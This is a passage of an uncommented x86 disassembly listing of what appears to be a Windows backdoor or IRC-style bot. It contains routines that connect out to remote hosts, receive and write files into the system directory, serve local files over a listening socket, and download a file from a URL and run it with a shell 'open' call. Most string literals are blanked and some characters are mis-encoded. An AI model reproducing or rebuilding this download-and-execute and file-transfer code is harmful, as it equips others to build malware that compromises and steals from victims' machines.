call sub_415D38
pop ecx
retn
sub_415DD8 endp
; =============== S U B R O U T I N E =======================================
sub_415E19 proc near ; CODE XREF: .text:0040E1FF�p
arg_0 = dword ptr 4
push esi
mov esi, offset byte_4CF5F4
loc_415E1F: ; CODE XREF: sub_415E19+27�j
cmp byte ptr [esi], 0
jz short loc_415E34
push [esp+4+arg_0] ; int
push esi ; Str
call sub_4185D3
pop ecx
test eax, eax
pop ecx
jnz short loc_415E46
loc_415E34: ; CODE XREF: sub_415E19+9�j
add esi, 80h
cmp esi, offset byte_4D35F4
jl short loc_415E1F
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_415E46: ; CODE XREF: sub_415E19+19�j
push 1
pop eax
pop esi
retn
sub_415E19 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E4B proc near ; DATA XREF: sub_401ACD+2844�o
Dest = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
Str = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
push 1
rep movsd
xor edx, edx
pop edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_415E9E
push edx ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push offset dword_437F6C ; int
push eax ; Str
push [ebp+var_11C] ; int
call sub_409869
add esp, 14h
loc_415E9E: ; CODE XREF: sub_415E4B+33�j
cmp [ebp+Str], 0
jz short loc_415EBE
lea eax, [ebp+Str]
push eax ; Str
call _atoi
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_415EBE
mov [ebp+var_8], eax
loc_415EBE: ; CODE XREF: sub_415E4B+5A�j
; sub_415E4B+6E�j
and [ebp+arg_0], 0
mov esi, offset byte_4CF5F4
loc_415EC7: ; CODE XREF: sub_415E4B+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_415F21
cmp byte ptr [esi], 0
jz short loc_415F10
cmp [ebp+Str], 0
jz short loc_415EF6
cmp [ebp+var_4], 0
jnz short loc_415EF6
lea eax, [ebp+Str]
push eax ; int
push esi ; Str
call sub_4185D3
pop ecx
test eax, eax
pop ecx
jz short loc_415F10
loc_415EF6: ; CODE XREF: sub_415E4B+90�j
; sub_415E4B+96�j
push edi ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push esi ; int
push eax ; Str
push [ebp+var_11C] ; int
call sub_409869
add esp, 14h
loc_415F10: ; CODE XREF: sub_415E4B+87�j
; sub_415E4B+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset byte_4D35F4
jl short loc_415EC7
loc_415F21: ; CODE XREF: sub_415E4B+82�j
lea eax, [ebp+Dest]
push offset asc_437F50 ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_415F5B
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_118]
push eax ; Str
push [ebp+var_11C] ; int
call sub_409869
add esp, 14h
loc_415F5B: ; CODE XREF: sub_415E4B+EE�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
push [ebp+var_18]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
pop edi
pop esi
sub_415E4B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F7A proc near ; CODE XREF: sub_416000+33�p
; sub_416563+BC�p
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call dword_4CBA54 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_415FF6
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+arg_4]
call dword_4CB9D4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call dword_4CBA14 ; inet_addr
cmp eax, esi
jnz short loc_415FDB
push [ebp+arg_0]
call dword_4CBA58 ; gethostbyname
test eax, eax
jz short loc_415FF6
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_415FDB: ; CODE XREF: sub_415F7A+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
call dword_4CB97C ; connect
cmp eax, esi
jnz short loc_415FFA
push edi
call dword_4CBA6C ; closesocket
loc_415FF6: ; CODE XREF: sub_415F7A+1B�j
; sub_415F7A+58�j
mov eax, esi
jmp short loc_415FFC
; ---------------------------------------------------------------------------
loc_415FFA: ; CODE XREF: sub_415F7A+73�j
mov eax, edi
loc_415FFC: ; CODE XREF: sub_415F7A+7E�j
pop edi
pop esi
leave
retn
sub_415F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416000 proc near ; DATA XREF: sub_401ACD+A02�o
Dst = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
Str = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_415F7A
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_416093
lea eax, [ebp+Dst]
push offset asc_437FEC ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_416076
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409869
add esp, 14h
loc_416076: ; CODE XREF: sub_416000+59�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
push [ebp+var_10]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_416093: ; CODE XREF: sub_416000+3F�j
push offset byte_43DB88
push ebx
call sub_41A1B1
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4160FE
lea eax, [ebp+Dst]
push offset asc_437FBC ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_4160DA
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409869
add esp, 14h
loc_4160DA: ; CODE XREF: sub_416000+BD�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
pop ecx
push ebx
call dword_4CBA6C ; closesocket
push [ebp+var_10]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_4160FE: ; CODE XREF: sub_416000+A3�j
push 64h
call ds:dword_427080 ; Sleep
xor edi, edi
mov esi, 1000h
loc_41610D: ; CODE XREF: sub_416000+168�j
push esi ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push edi
push esi
push eax
push ebx
call dword_4CB9EC ; recv
test eax, eax
jle short loc_41616A
lea eax, [ebp+Dst]
push offset asc_42A080 ; "\n"
push eax ; Dest
call _strcat
lea eax, [ebp+Dst]
push eax ; Str
call sub_419F9D
add esp, 0Ch
test eax, eax
jz short loc_41616A
push 64h
call ds:dword_427080 ; Sleep
push 0Ah
call sub_40B602
test eax, eax
pop ecx
jnz short loc_41610D
loc_41616A: ; CODE XREF: sub_416000+130�j
; sub_416000+154�j
lea eax, [ebp+Dst]
push offset asc_437F88 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_41619D
push edi ; int
lea eax, [ebp+Dst]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push ebx ; int
call sub_409869
add esp, 14h
loc_41619D: ; CODE XREF: sub_416000+180�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
pop ecx
push ebx
call dword_4CBA6C ; closesocket
push [ebp+var_10]
call sub_40B6D6
pop ecx
push edi
call ds:dword_4270D4 ; ExitThread
sub_416000 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4161C1 proc near ; DATA XREF: sub_401ACD+7696�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
Dest = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
Str = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dst = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call dword_4CBA54 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_41620F
push offset unk_4380EC
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_41620F: ; CODE XREF: sub_4161C1+42�j
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push esi
call dword_4CB9D4 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+Dst]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call dword_4CBA00 ; bind
test eax, eax
jz short loc_41624D
push offset unk_4380C8
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_41624D: ; CODE XREF: sub_4161C1+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+Dst]
push eax
push edi
call dword_4CB978 ; getsockname
push [ebp+var_2E]
call dword_4CB904 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+Str]
push eax ; Str
mov [ebp+arg_0], esi
call _strlen
pop ecx
loc_41627F: ; CODE XREF: sub_4161C1+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+Str]
cmp al, 20h
jnz short loc_416292
push 5Fh
pop eax
jmp short loc_416295
; ---------------------------------------------------------------------------
loc_416292: ; CODE XREF: sub_4161C1+CA�j
movsx eax, al
loc_416295: ; CODE XREF: sub_4161C1+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+Str]
inc ecx
push eax ; Str
mov [ebp+arg_0], ecx
call _strlen
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_41627F
push ebx
push edi
call dword_4CB9FC ; listen
test eax, eax
jz short loc_4162C8
push offset asc_437FEC ; "-"
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_4162C8: ; CODE XREF: sub_4161C1+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+Str]
push 80000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_4162F2
push offset unk_4380A8
jmp loc_4163C8
; ---------------------------------------------------------------------------
loc_4162F2: ; CODE XREF: sub_4161C1+125�j
push esi
push eax
call ds:dword_427114 ; GetFileSize
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AA06
pop ecx
push eax
call dword_4CBA14 ; inet_addr
push eax
call dword_4CB9D0 ; htonl
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset dword_438090 ; Format
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dest]
push esi ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409869
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call dword_4CB9BC ; select
test eax, eax
jg short loc_4163A2
push esi ; int
lea eax, [ebp+var_DC]
push [ebp+var_54] ; int
push offset dword_438078 ; int
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409869
jmp loc_4164C6
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_4161C1+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call dword_4CBA68 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_4163DB
push offset asc_438054 ; "-"
loc_4163C8: ; CODE XREF: sub_4161C1+49�j
; sub_4161C1+87�j ...
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_4164C9
; ---------------------------------------------------------------------------
loc_4163DB: ; CODE XREF: sub_4161C1+200�j
push edi
call dword_4CBA6C ; closesocket
cmp [ebp+arg_0], esi
jz loc_41648D
mov edi, 400h
loc_4163F0: ; CODE XREF: sub_4161C1+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_4163FD
mov [ebp+var_4], eax
loc_4163FD: ; CODE XREF: sub_4161C1+237�j
push edi ; Size
lea eax, [ebp+var_A04]
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:dword_427128 ; SetFilePointer
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:dword_4270EC ; ReadFile
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call dword_4CBA24 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call dword_4CB9EC ; recv
cmp eax, ebx
jl loc_416522
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_416522
sub [ebp+arg_0], eax
jnz loc_4163F0
mov edi, [ebp+var_18]
loc_41648D: ; CODE XREF: sub_4161C1+224�j
push [ebp+var_8]
call ds:dword_427070 ; CloseHandle
push [ebp+var_C]
push [ebp+var_10]
call sub_416CC9
pop ecx
pop ecx
push eax
push [ebp+var_44]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset asc_438028 ; "-"
push eax ; Dest
call _sprintf
loc_4164C6: ; CODE XREF: sub_4161C1+1DC�j
add esp, 14h
loc_4164C9: ; CODE XREF: sub_4161C1+215�j
cmp [ebp+var_50], esi
jnz short loc_4164EE
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_54] ; int
push eax ; int
lea eax, [ebp+var_DC]
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409869
add esp, 14h
loc_4164EE: ; CODE XREF: sub_4161C1+30B�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
cmp edi, esi
pop ecx
jbe short loc_416506
push edi
call dword_4CBA6C ; closesocket
loc_416506: ; CODE XREF: sub_4161C1+33C�j
push [ebp+var_1F8]
call dword_4CBA6C ; closesocket
push [ebp+var_58]
call sub_40B6D6
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_416522: ; CODE XREF: sub_4161C1+2AF�j
; sub_4161C1+2BA�j
push esi ; int
mov esi, offset asc_438010 ; "-"
push [ebp+var_54] ; int
lea eax, [ebp+var_DC]
push esi ; int
push eax ; Str
push [ebp+var_1FC] ; int
call sub_409869
push esi
call sub_415D38
add esp, 18h
push [ebp+var_1F8]
call dword_4CBA6C ; closesocket
push [ebp+var_58]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_4161C1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416563 proc near ; DATA XREF: sub_401ACD+798�o
Dst = byte ptr -14C4h
var_4C4 = dword ptr -4C4h
Filename = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
Str = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
File = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+Filename]
push 104h
push eax
call ds:dword_42707C ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Filename]
push offset aSS ; "%s%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Filename]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_4165ED
push offset unk_43818C
jmp short loc_416633
; ---------------------------------------------------------------------------
loc_4165ED: ; CODE XREF: sub_416563+81�j
push eax
call ds:dword_427070 ; CloseHandle
lea eax, [ebp+Filename]
push offset aAB ; "a+b"
push eax ; Filename
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+File], eax
jnz short loc_416615
push offset unk_43815C
jmp short loc_416633
; ---------------------------------------------------------------------------
loc_416615: ; CODE XREF: sub_416563+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_415F7A
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_416646
push offset asc_43813C ; "-"
loc_416633: ; CODE XREF: sub_416563+88�j
; sub_416563+B0�j
lea eax, [ebp+var_4C4]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_416742
; ---------------------------------------------------------------------------
loc_416646: ; CODE XREF: sub_416563+C9�j
mov esi, 1000h
loc_41664B: ; CODE XREF: sub_416563+14E�j
push esi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4CB9EC ; recv
mov edi, eax
cmp edi, ebx
jz loc_416712
cmp edi, 0FFFFFFFFh
jz short loc_4166B3
push [ebp+File] ; File
lea eax, [ebp+Dst]
push edi ; Count
push 1 ; Size
push eax ; Str
call _fwrite
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call dword_4CB9D0 ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
jmp short loc_41664B
; ---------------------------------------------------------------------------
loc_4166B3: ; CODE XREF: sub_416563+118�j
lea eax, [ebp+var_4C4]
push offset asc_438010 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+var_4C4]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1C0] ; int
call sub_409869
lea eax, [ebp+var_4C4]
push eax
call sub_415D38
push [ebp+File] ; File
call _fclose
add esp, 24h
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
push [ebp+var_1C]
call sub_40B6D6
pop ecx
push 1
call ds:dword_4270D4 ; ExitThread
loc_416712: ; CODE XREF: sub_416563+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_416CC9
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_4C4]
push offset asc_438110 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
loc_416742: ; CODE XREF: sub_416563+DE�j
cmp [ebp+var_14], ebx
jnz short loc_416767
push ebx ; int
lea eax, [ebp+var_4C4]
push [ebp+var_18] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1C0] ; int
call sub_409869
add esp, 14h
loc_416767: ; CODE XREF: sub_416563+1E2�j
lea eax, [ebp+var_4C4]
push eax
call sub_415D38
cmp [ebp+File], ebx
pop ecx
jz short loc_416782
push [ebp+File] ; File
call _fclose
pop ecx
loc_416782: ; CODE XREF: sub_416563+214�j
cmp [ebp+arg_0], ebx
jbe short loc_416790
push [ebp+arg_0]
call dword_4CBA6C ; closesocket
loc_416790: ; CODE XREF: sub_416563+222�j
push [ebp+var_1C]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
sub_416563 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; DATA XREF: sub_401ACD+619B�o
; sub_401ACD+69D9�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
Dst = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
Str = byte ptr -2C8h
var_248 = byte ptr -248h
Filename = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_4CB984
call dword_4CB8D8 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_416C2C
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+Filename]
push 40000000h
push eax
call ds:dword_4270F8 ; CreateFileA
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_416867
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset asc_438358 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_41684A
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409869
add esp, 14h
loc_41684A: ; CODE XREF: sub_4167A0+88�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
push [ebp+var_48]
call sub_40B6D6
pop ecx
pop ecx
push esi
call ds:dword_4270D4 ; ExitThread
loc_416867: ; CODE XREF: sub_4167A0+68�j
xor edi, edi
call ds:dword_4270B0 ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx ; Size
call _malloc
pop ecx
mov [ebp+var_1C], eax
loc_416881: ; CODE XREF: sub_4167A0+1B4�j
push 200h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+Dst]
push 200h
push eax
push [ebp+var_18]
call dword_4CB8E0 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_4168C5
push [ebp+arg_0]
lea eax, [ebp+Dst]
push eax
call sub_416C92
pop ecx
pop ecx
loc_4168C5: ; CODE XREF: sub_4167A0+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+Dst]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_4270F0 ; WriteFile
cmp edi, ebx
jnb short loc_416903
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_4168ED
mov eax, [ebp+arg_0]
loc_4168ED: ; CODE XREF: sub_4167A0+148�j
push eax ; Size
lea eax, [ebp+Dst]
push eax ; Src
mov eax, [ebp+var_1C]
add eax, edi
push eax ; Dst
call _memcpy
add esp, 0Ch
loc_416903: ; CODE XREF: sub_4167A0+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_416910
cmp edi, [ebp+var_3C]
ja short loc_41695A
loc_416910: ; CODE XREF: sub_4167A0+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_41692A
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_438330
jmp short loc_41693A
; ---------------------------------------------------------------------------
loc_41692A: ; CODE XREF: sub_4167A0+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset asc_438308 ; "-"
loc_41693A: ; CODE XREF: sub_4167A0+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_43E710
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_416881
loc_41695A: ; CODE XREF: sub_4167A0+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_4169AF
cmp edi, [ebp+var_3C]
jz short loc_4169AF
push [ebp+var_3C]
lea eax, [ebp+Dst]
mov [ebp+var_14], esi
push edi
push offset asc_4382DC ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409869
lea eax, [ebp+Dst]
push eax
call sub_415D38
add esp, 28h
loc_4169AF: ; CODE XREF: sub_4167A0+1C4�j
; sub_4167A0+1C9�j
call ds:dword_4270B0 ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:dword_427070 ; CloseHandle
push [ebp+var_1C]
call sub_41BA91
cmp [ebp+var_38], esi
pop ecx
jz short loc_416A39
lea eax, [ebp+Filename]
push eax ; Filename
call sub_4010AB
cmp eax, [ebp+var_38]
pop ecx
jz short loc_416A39
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+Dst]
push offset asc_4382B4 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409869
lea eax, [ebp+Dst]
push eax
call sub_415D38
add esp, 28h
loc_416A39: ; CODE XREF: sub_4167A0+241�j
; sub_4167A0+253�j
cmp [ebp+var_14], esi
jz loc_416C79
cmp [ebp+var_44], 1
jz loc_416B34
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_427690
lea eax, [ebp+Filename]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+Dst]
fmul ds:dbl_427690
fstp [esp+590h+var_590]
push offset asc_43827C ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_416AB4
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409869
add esp, 14h
loc_416AB4: ; CODE XREF: sub_4167A0+2F2�j
lea eax, [ebp+Dst]
push eax
call sub_415D38
cmp [ebp+var_40], 1
pop ecx
jnz loc_416C79
push 5
push esi
lea eax, [ebp+Filename]
push esi
push eax
push offset aOpen ; "open"
push esi
call dword_4CB940
cmp [ebp+var_30], esi
jnz loc_416C79
lea eax, [ebp+Filename]
push eax
lea eax, [ebp+Dst]
push offset asc_438260 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push [ebp+var_2C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_2CC] ; int
call sub_409869
lea eax, [ebp+Dst]
push eax
call sub_415D38
add esp, 24h
jmp loc_416C79
; ---------------------------------------------------------------------------
